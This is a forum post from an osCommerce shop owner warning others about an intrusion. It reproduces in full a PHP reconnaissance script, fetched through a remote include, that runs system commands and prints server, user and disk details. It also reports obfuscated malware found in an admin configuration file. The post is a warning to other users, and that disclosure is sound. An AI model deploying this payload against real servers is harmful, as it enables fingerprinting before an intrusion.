Hackers Entry Point into Oscommerce

[elton123]

Hi

 

I've noticed some strange activity on my website. Under who's online I've noticed the following url:

 

http://***.100megsfree8.com/id.gif?

 

I've clicked on it and the following code was submitted:

 

<?php

function ConvertBytes($number)

{

$len = strlen($number);

if($len < 4)

{

return sprintf("%d b", $number);

}

if($len >= 4 && $len <=6)

{

return sprintf("%0.2f Kb", $number/1024);

}

if($len >= 7 && $len <=9)

{

return sprintf("%0.2f Mb", $number/1024/1024);

}

 

return sprintf("%0.2f Gb", $number/1024/1024/1024);

 

}

 

echo "CabaL<br>";

$un = @php_uname();

$up = system(uptime);

$id1 = system(id);

$pwd1 = @getcwd();

$sof1 = getenv("SERVER_SOFTWARE");

$php1 = phpversion();

$name1 = $_SERVER['SERVER_NAME'];

$ip1 = gethostbyname($SERVER_ADDR);

$free1= diskfreespace($pwd1);

$free = ConvertBytes(diskfreespace($pwd1));

if (!$free) {$free = 0;}

$all1= disk_total_space($pwd1);

$all = ConvertBytes(disk_total_space($pwd1));

if (!$all) {$all = 0;}

$used = ConvertBytes($all1-$free1);

$os = @PHP_OS;

 

 

echo "CabaL<br>";

echo "uname -a: $un<br>";

echo "os: $os<br>";

echo "uptime: $up<br>";

echo "id: $id1<br>";

echo "pwd: $pwd1<br>";

echo "php: $php1<br>";

echo "software: $sof1<br>";

echo "server-name: $name1<br>";

echo "server-ip: $ip1<br>";

echo "free: $free<br>";

echo "used: $used<br>";

echo "total: $all<br>";

exit;

 

I immediately banned all ips originating from it which was active on my website.

 

I alerted my server host as well.

 

My host reported back that malicious code was found on my website which they removed.

 

/home/*******/public_html/admin/includes/configuration_cache.php: PHP.Obfus FOUND

 

I'm posting this info here as a warning to other users.

 

Kind Regards